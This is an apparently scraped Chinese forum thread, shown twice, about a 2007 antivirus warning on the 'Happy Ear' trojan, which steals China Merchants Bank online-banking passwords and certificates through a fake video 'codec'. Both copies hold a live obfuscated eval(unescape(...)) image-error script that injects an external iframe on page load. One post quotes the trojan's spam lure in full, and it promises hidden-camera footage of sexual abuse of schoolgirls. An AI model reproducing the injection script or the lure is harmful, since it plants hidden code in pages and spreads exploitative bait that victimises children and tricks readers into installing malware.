针对招商银行网银个人专业版的木马病毒及其变种
[转贴 2010-04-10 14:54:58]
针对招商银行网银个人专业版的木马病毒及其变种
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_336_280.html%20width%3D336%20height%3D280%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
“快乐耳朵”病毒专偷网上银行 已经有用户被感染
2007-9-1 14:58:00 信息源:瑞星公司
广告
【快讯】9月1日上午,瑞星全球反病毒监测网率先截获专门针对招商银行个人版网上业务的木马病毒及其变种,并命名为“快乐耳朵 (Trojan.Happyear.a)”和“快乐耳朵变种B(Trojan.Happyear.b)”病毒,病毒编写者的{wy}意图就是窃取招行用户的网上银行资料,进而窃取用户的资金。
病毒编写者开设了若干个假冒的“偷拍电影”网站,当被骗的用户登陆这些网站后,会被提示“观看本站的电影必须安装新编码器”,进而被诱骗下载所谓的“编码器”。事实上,这个“编码器”就是病毒,用户下载并运行之后就会被感染,当被感染用户再次使用招行的网上银行业务时,用户帐号、密码和数字证书就会被窃取并发向病毒编写者的信箱。
“快乐耳朵”病毒会在用户电脑上搜索电子邮件地址,向外大量发送垃圾邮件,邮件题目是“快来看看我的偷拍作品”,诱惑更多用户登陆病毒作者建立的病毒网站。同时,许多网上论坛也出现类似的帖子,欺骗网友登陆病毒网站。
从9月1日早上开始,瑞星技术服务部门陆续收到若干用户的求助,用户反应登陆某些不良网站之后,自己的电脑开始出现异常。瑞星技术人员确认,其中部分用户已经被“快乐耳朵”病毒感染。瑞星工程师郑重警告使用招行网络银行个人版的用户,千万不要登陆来历不明的不良网站,并为了看到某些“刺激内容”而下载所谓的“编码器”。
瑞星反病毒部门负责人蔡骏介绍说,以往类似的木马病毒一般只盗窃用户的账号和密码,攻击者利用偷窃的资料登陆网络银行的大众版,只能浏览用户账号资料而不能进行转账、消费等操作。而招商银行个人银行专业版提供了相当强大的功能,可以在网上进行转账、网络消费、金融理财等。
瑞星反病毒专家表示,这两个病毒的出现,并不意味着招行的网络银行系统存在漏洞,主要是通过欺骗用户登陆不良网站来侵入用户的电脑,从而窃取用户的银行资料。获得这些资料之后,病毒编写者可以通过网上转帐和消费等方式,xx用户的资金。
[ Last edited by xibeihuizi on 2007-9-2 at 11:45 ]
--------------------------------------------------------------------
不知是不是瑞星搞出来让人买他的软件的鬼把戏!!!xx方法说的不明不白。。。
--------------------------------------------------------------------
QUOTE:Originally posted by xibeihuizi at 2007-9-2 11:42:
不知是不是瑞星搞出来让人买他的软件的鬼把戏!!!xx方法说的不明不白。。。 还不懂吗?木马嘛!:cool:
--------------------------------------------------------------------
QUOTE:Originally posted by won at 2007-9-2 12:43 PM:
还不懂吗?木马嘛!:cool: 密码怎么盗的?用什么方法,好像只有键盘记录才能盗招行的密码吧。但一般的键盘记录对招行的那个控件都不管用。
用什么方法盗证书?
又用什么方法把资料发送出去呢?是怎么样躲过防火墙的?
证书盗到别人的电脑上又是怎样用的?难道是启动了专业版后自己将证书备份的吗?
瑞星至少应该简单的交待一下这些基本的东西,现在什么也没说,所以有点怀疑。
;););)
现在杀毒软件都靠这种东西赚钱
--------------------------------------------------------------------
看来还是usbkey安全点.......
--------------------------------------------------------------------
对网银的工作方式不是很了解,请教一下大虾:
如果木马将安装好的网银原封不动的打包发出(姑且不讨论如何通过防火墙,不过这一点很多木马都能做到),再在本地的机器上照原路径安装,然后通过修改注册表之类的方法来达到类似在本地安装的目的。如果已获取用户名和密码的话,这样“克隆”的专业版可以正常使用吗?
--------------------------------------------------------------------
原文如下,有胆量者可以一试,后果自负!;)
朋友:
你好!
我是某五星级酒店的经理,同时我也是一名专拍社会丑恶现象的偷拍爱好者,近年来我在酒店一些xx客房偷偷装上摄像头,偷拍了两百多部作品,里面既有夫妻新婚之夜的夫妻生活片段;也有演艺圈内一些演员为讨好名导演发生的xx易实录;甚至还有一些富豪花高价购买中学女生们初夜权,更为可耻的是居然还是在白天和年仅十五、六岁发育不太成熟的中学小女xx生性关系,因此其丑恶行径拍得更清楚不过了,这些富豪们退房后本人还在其房间拍到了床单上其与中学女xx生性关系留下的鲜红的血迹.为了揭露社会的这些丑恶现象,让这些人接受社会的谴责,本人特开办"中国丑恶现象偷伯网",将本人偷拍到的这些社会丑恶方面的作品公开,希望能得到网友们的支持,如果你也有关于这方面的作品,也可以在本人的网站上发布.
"中国丑恶现象偷拍网"网址:,欢迎访问,希望能得到大家的支持,本网站系公益性网站,无任何广告,偷拍影片全部采用asx格式压缩,如果您的系统没有安装解码器,可以在本站在线安装或下载安装即可观赏本人的作品.
中国丑恶现象偷伯网
--------------------------------------------------------------------
QUOTE:Originally posted by purbam at 2007-9-2 14:09:
对网银的工作方式不是很了解,请教一下大虾:
如果木马将安装好的网银原封不动的打包发出(姑且不讨论如何通过防火墙,不过这一点很多木马都能做到),再在本地的机器上照原路径安装,然后通过修改注册表之类的 ... 只需备份你的证书和知道你的密码就可以了!专业版可以直接去招行网站下载后安装,然后启用证书恢复功能.
--------------------------------------------------------------------
QUOTE:Originally posted by danny at 2007-9-2 15:13:
只需备份你的证书和知道你的密码就可以了!专业版可以直接去招行网站下载后安装,然后启用证书恢复功能. 利用备份的证书比较麻烦,还要启用证书,这需要身份证号之类的信息
--------------------------------------------------------------------
招行官方有没有说如何解决这个问题?
![]()
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zf_336_280.html%20width%3D336%20height%3D280%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">
“快乐耳朵”病毒专偷网上银行 已经有用户被感染
2007-9-1 14:58:00 信息源:瑞星公司
广告
【快讯】9月1日上午,瑞星全球反病毒监测网率先截获专门针对招商银行个人版网上业务的木马病毒及其变种,并命名为“快乐耳朵 (Trojan.Happyear.a)”和“快乐耳朵变种B(Trojan.Happyear.b)”病毒,病毒编写者的{wy}意图就是窃取招行用户的网上银行资料,进而窃取用户的资金。
病毒编写者开设了若干个假冒的“偷拍电影”网站,当被骗的用户登陆这些网站后,会被提示“观看本站的电影必须安装新编码器”,进而被诱骗下载所谓的“编码器”。事实上,这个“编码器”就是病毒,用户下载并运行之后就会被感染,当被感染用户再次使用招行的网上银行业务时,用户帐号、密码和数字证书就会被窃取并发向病毒编写者的信箱。
“快乐耳朵”病毒会在用户电脑上搜索电子邮件地址,向外大量发送垃圾邮件,邮件题目是“快来看看我的偷拍作品”,诱惑更多用户登陆病毒作者建立的病毒网站。同时,许多网上论坛也出现类似的帖子,欺骗网友登陆病毒网站。
从9月1日早上开始,瑞星技术服务部门陆续收到若干用户的求助,用户反应登陆某些不良网站之后,自己的电脑开始出现异常。瑞星技术人员确认,其中部分用户已经被“快乐耳朵”病毒感染。瑞星工程师郑重警告使用招行网络银行个人版的用户,千万不要登陆来历不明的不良网站,并为了看到某些“刺激内容”而下载所谓的“编码器”。
瑞星反病毒部门负责人蔡骏介绍说,以往类似的木马病毒一般只盗窃用户的账号和密码,攻击者利用偷窃的资料登陆网络银行的大众版,只能浏览用户账号资料而不能进行转账、消费等操作。而招商银行个人银行专业版提供了相当强大的功能,可以在网上进行转账、网络消费、金融理财等。
瑞星反病毒专家表示,这两个病毒的出现,并不意味着招行的网络银行系统存在漏洞,主要是通过欺骗用户登陆不良网站来侵入用户的电脑,从而窃取用户的银行资料。获得这些资料之后,病毒编写者可以通过网上转帐和消费等方式,xx用户的资金。
[ Last edited by xibeihuizi on 2007-9-2 at 11:45 ]
--------------------------------------------------------------------
不知是不是瑞星搞出来让人买他的软件的鬼把戏!!!xx方法说的不明不白。。。
--------------------------------------------------------------------
QUOTE:Originally posted by xibeihuizi at 2007-9-2 11:42:
不知是不是瑞星搞出来让人买他的软件的鬼把戏!!!xx方法说的不明不白。。。 还不懂吗?木马嘛!:cool:
--------------------------------------------------------------------
QUOTE:Originally posted by won at 2007-9-2 12:43 PM:
还不懂吗?木马嘛!:cool: 密码怎么盗的?用什么方法,好像只有键盘记录才能盗招行的密码吧。但一般的键盘记录对招行的那个控件都不管用。
用什么方法盗证书?
又用什么方法把资料发送出去呢?是怎么样躲过防火墙的?
证书盗到别人的电脑上又是怎样用的?难道是启动了专业版后自己将证书备份的吗?
瑞星至少应该简单的交待一下这些基本的东西,现在什么也没说,所以有点怀疑。
;););)
现在杀毒软件都靠这种东西赚钱
--------------------------------------------------------------------
看来还是usbkey安全点.......
--------------------------------------------------------------------
对网银的工作方式不是很了解,请教一下大虾:
如果木马将安装好的网银原封不动的打包发出(姑且不讨论如何通过防火墙,不过这一点很多木马都能做到),再在本地的机器上照原路径安装,然后通过修改注册表之类的方法来达到类似在本地安装的目的。如果已获取用户名和密码的话,这样“克隆”的专业版可以正常使用吗?
--------------------------------------------------------------------
原文如下,有胆量者可以一试,后果自负!;)
朋友:
你好!
我是某五星级酒店的经理,同时我也是一名专拍社会丑恶现象的偷拍爱好者,近年来我在酒店一些xx客房偷偷装上摄像头,偷拍了两百多部作品,里面既有夫妻新婚之夜的夫妻生活片段;也有演艺圈内一些演员为讨好名导演发生的xx易实录;甚至还有一些富豪花高价购买中学女生们初夜权,更为可耻的是居然还是在白天和年仅十五、六岁发育不太成熟的中学小女xx生性关系,因此其丑恶行径拍得更清楚不过了,这些富豪们退房后本人还在其房间拍到了床单上其与中学女xx生性关系留下的鲜红的血迹.为了揭露社会的这些丑恶现象,让这些人接受社会的谴责,本人特开办"中国丑恶现象偷伯网",将本人偷拍到的这些社会丑恶方面的作品公开,希望能得到网友们的支持,如果你也有关于这方面的作品,也可以在本人的网站上发布.
"中国丑恶现象偷拍网"网址:,欢迎访问,希望能得到大家的支持,本网站系公益性网站,无任何广告,偷拍影片全部采用asx格式压缩,如果您的系统没有安装解码器,可以在本站在线安装或下载安装即可观赏本人的作品.
中国丑恶现象偷伯网
--------------------------------------------------------------------
QUOTE:Originally posted by purbam at 2007-9-2 14:09:
对网银的工作方式不是很了解,请教一下大虾:
如果木马将安装好的网银原封不动的打包发出(姑且不讨论如何通过防火墙,不过这一点很多木马都能做到),再在本地的机器上照原路径安装,然后通过修改注册表之类的 ... 只需备份你的证书和知道你的密码就可以了!专业版可以直接去招行网站下载后安装,然后启用证书恢复功能.
--------------------------------------------------------------------
QUOTE:Originally posted by danny at 2007-9-2 15:13:
只需备份你的证书和知道你的密码就可以了!专业版可以直接去招行网站下载后安装,然后启用证书恢复功能. 利用备份的证书比较麻烦,还要启用证书,这需要身份证号之类的信息
--------------------------------------------------------------------
招行官方有没有说如何解决这个问题?
郑重声明:资讯 【针对招商银行网银个人专业版的木马病毒及其变种- derivations ...】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——
